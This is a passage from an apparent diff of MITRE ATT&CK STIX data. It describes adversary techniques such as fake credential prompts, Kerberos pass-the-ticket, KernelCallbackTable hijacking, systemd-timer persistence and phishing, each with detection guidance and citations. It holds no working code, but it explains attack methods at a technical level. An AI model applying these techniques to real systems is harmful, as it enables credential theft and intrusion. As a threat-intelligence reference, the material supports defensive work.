Retrieved April 9, 2018.", + "url": "https://github.com/f0rb1dd3n/Reptile" + }, + { + "source_name": "Volatility Phalanx2", + "description": "Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.", + "url": "https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html" + }, + { + "source_name": "iDefense Rootkit Overview", + "description": "Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018.", + "url": "http://www.megasecurity.org/papers/Rootkits.pdf" + }, + { + "source_name": "Linux Loadable Kernel Module Insert and Remove LKMs", + "description": "Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018.", + "url": "http://tldp.org/HOWTO/Module-HOWTO/x197.html" + }, + { + "source_name": "CrowdStrike Linux Rootkit", + "description": "Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.", + "url": "https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/" + }, + { + "source_name": "GitHub Diamorphine", + "description": "Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.", + "url": "https://github.com/m0nad/Diamorphine" + }, + { + "source_name": "Securelist Ventir", + "description": "Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018.", + "url": "https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/" + }, + { + "source_name": "User Approved Kernel Extension Pike’s", + "description": "Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading…. Retrieved September 23, 2021.", + "url": "https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/" + }, + { + "source_name": "Linux Kernel Module Programming Guide", + "description": "Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018.", + "url": "http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html" + }, + { + "source_name": "Linux Kernel Programming", + "description": "Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.", + "url": "https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf" + }, + { + "source_name": "Trend Micro Skidmap", + "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/" + }, + { + "source_name": "Purves Kextpocalypse 2", + "description": "Richard Purves. (2017, November 9). MDM and the Kextpocalypse . Retrieved September 23, 2021.", + "url": "https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/" + }, + { + "source_name": "RSAC 2015 San Francisco Patrick Wardle", + "description": "Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "Synack Secure Kernel Extension Broken", + "description": "Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018.", + "url": "https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/" + }, + { + "source_name": "Wikipedia Loadable Kernel Module", + "description": "Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018.", + "url": "https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-15T23:39:31.474Z", + "name": "GUI Input Capture", + "description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)\n\nAdversaries may also mimic common software authentication requests, such as those from browsers or email clients. This may also be paired with user activity monitoring (i.e., [Browser Information Discovery](https://attack.mitre.org/techniques/T1217) and/or [Application Window Discovery](https://attack.mitre.org/techniques/T1010)) to spoof prompts when users are naturally accessing sensitive sites/data.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matthew Molyett, @s1air, Cisco Talos" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials. For example, command/script history including abnormal parameters (such as requests for credentials and/or strings related to creating password prompts) may be malicious.(Citation: Spoofing credential dialogs) \n\nInspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", + "created": "2020-02-11T18:58:45.908Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1056/002", + "external_id": "T1056.002" + }, + { + "source_name": "LogRhythm Do You Trust Oct 2014", + "description": "Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved December 17, 2018.", + "url": "https://logrhythm.com/blog/do-you-trust-your-computer/" + }, + { + "source_name": "Spoofing credential dialogs", + "description": "Johann Rehberger. (2021, April 18). Spoofing credential dialogs on macOS Linux and Windows. Retrieved August 19, 2021.", + "url": "https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/" + }, + { + "source_name": "OSX Keydnap malware", + "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", + "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/" + }, + { + "source_name": "Enigma Phishing for Credentials Jan 2015", + "description": "Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.", + "url": "https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/" + }, + { + "source_name": "OSX Malware Exploits MacKeeper", + "description": "Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits Mackeeper. Retrieved July 3, 2017.", + "url": "https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Pass the Ticket", + "description": "Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nIn this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)\n\nSilver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)\n\nGolden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ryan Becwar", + "Vincent Le Toux" + ], + "x_mitre_detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\n\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket. (Citation: CERT-EU Golden Ticket Protection)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Requires Microsoft Windows as a target system and Kerberos authentication enabled." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a257ed11-ff3b-4216-8c9d-3938ef57064c", + "created": "2017-05-31T21:31:11.623Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1097", + "external_id": "T1097" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/645.html", + "external_id": "CAPEC-645" + }, + { + "source_name": "ADSecurity AD Kerberos Attacks", + "description": "Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.", + "url": "https://adsecurity.org/?p=556" + }, + { + "source_name": "GentilKiwi Pass the Ticket", + "description": "Deply, B. (2014, January 13). Pass the ticket. Retrieved June 2, 2016.", + "url": "http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos" + }, + { + "source_name": "Campbell 2014", + "description": "Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014.", + "url": "http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf" + }, + { + "source_name": "CERT-EU Golden Ticket Protection", + "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.", + "url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-10-17T16:17:55.499Z", + "name": "Tool", + "description": "Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)\n\nAdversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "SOCCRATES", + "Mnemonic AS" + ], + "x_mitre_detection": "In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "created": "2020-10-01T02:08:33.977Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1588/002", + "external_id": "T1588.002" + }, + { + "source_name": "Recorded Future Beacon 2019", + "description": "Recorded Future. (2019, June 20). Out of the Blue: How Recorded Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.", + "url": "https://www.recordedfuture.com/identifying-cobalt-strike-servers/" + }, + { + "source_name": "Analyzing CS Dec 2020", + "description": "Maynier, E. (2020, December 20). Analyzing Cobalt Strike for Fun and Profit. Retrieved October 12, 2021.", + "url": "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Exfiltration over USB", + "description": "Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "William Cain" + ], + "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Presence of physical medium or device" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", + "created": "2020-03-11T13:50:11.467Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1052/001", + "external_id": "T1052.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "KernelCallbackTable", + "description": "Adversaries may abuse the KernelCallbackTable of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll is loaded.(Citation: Windows Process Injection KernelCallbackTable)\n\nAn adversary may hijack the execution flow of a process using the KernelCallbackTable by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.\n\nA pointer to the memory address of the KernelCallbackTable can be obtained by locating the PEB (ex: via a call to the NtQueryInformationProcess() [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the KernelCallbackTable can be duplicated, and a function in the table (e.g., fnCOPYDATA) set to the address of a malicious payload (ex: via WriteProcessMemory()). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)\n\nThe tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the KernelCallbackTable may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the KernelCallbackTable to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious behaviors that could relate to post-compromise behavior.\n\nMonitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances. for known bad sequence of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as WriteProcessMemory() and NtQueryInformationProcess() with the parameter set to ProcessBasicInformation may be used for this technique.(Citation: Lazarus APT January 2022)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde", + "created": "2022-02-25T15:27:44.927Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/013", + "external_id": "T1574.013" + }, + { + "source_name": "Lazarus APT January 2022", + "description": "Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.", + "url": "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/" + }, + { + "source_name": "FinFisher exposed ", + "description": "Microsoft Defender Security Research Team. (2018, March 1). FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines. Retrieved January 27, 2022.", + "url": "https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" + }, + { + "source_name": "Windows Process Injection KernelCallbackTable", + "description": "odzhan. (2019, May 25). Windows Process Injection: KernelCallbackTable used by FinFisher / FinSpy. Retrieved February 4, 2022.", + "url": "https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/" + }, + { + "source_name": "NtQueryInformationProcess", + "description": "Microsoft. (2021, November 23). NtQueryInformationProcess function (winternl.h). Retrieved February 4, 2022.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Search Closed Sources", + "description": "Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)\n\nAdversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4", + "created": "2020-10-02T17:01:42.558Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1597", + "external_id": "T1597" + }, + { + "source_name": "D3Secutrity CTI Feeds", + "description": "Banerd, W. (2019, April 30). 10 of the Best Open Source Threat Intelligence Feeds. Retrieved October 20, 2020.", + "url": "https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/" + }, + { + "source_name": "ZDNET Selling Data", + "description": "Cimpanu, C. (2020, May 9). A hacker group is selling more than 73 million user records on the dark web. Retrieved October 20, 2020.", + "url": "https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-08T11:56:26.862Z", + "name": "Systemd Timers", + "description": "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)\n\nEach .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.\n\nAn adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.(Citation: Falcon Sandbox smp: 28553b3a9d)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "SarathKumar Rajendran, Trimble Inc" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.\n\nSuspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAudit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "root" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", + "created": "2020-10-12T17:50:31.584Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1053/006", + "external_id": "T1053.006" + }, + { + "source_name": "Systemd Remote Control", + "description": "Aaron Kili. (2018, January 16). How to Control Systemd Services on Remote Linux Server. Retrieved July 26, 2021.", + "url": "https://www.tecmint.com/control-systemd-services-on-remote-linux-server/" + }, + { + "source_name": "archlinux Systemd Timers Aug 2020", + "description": "archlinux. (2020, August 11). systemd/Timers. Retrieved October 12, 2020.", + "url": "https://wiki.archlinux.org/index.php/Systemd/Timers" + }, + { + "source_name": "gist Arch package compromise 10JUL2018", + "description": "Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.", + "url": "https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a" + }, + { + "source_name": "Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018", + "description": "Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.", + "url": "https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/" + }, + { + "source_name": "acroread package compromised Arch Linux Mail 8JUL2018", + "description": "Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.", + "url": "https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html" + }, + { + "source_name": "Falcon Sandbox smp: 28553b3a9d", + "description": "Hybrid Analysis. (2018, July 11). HybridAnalsysis of sample 28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7. Retrieved September 8, 2023.", + "url": "https://www.hybrid-analysis.com/sample/28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7?environmentId=300" + }, + { + "source_name": "Linux man-pages: systemd January 2014", + "description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.", + "url": "http://man7.org/linux/man-pages/man1/systemd.1.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-01T16:56:32.245Z", + "name": "Phishing", + "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Philip Winther", + "Ohad Zaidenberg, @ohad_mz", + "Liora Itkin", + "Liran Ravich, CardinalOps", + "Scott Cook, Capital One" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nURL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of 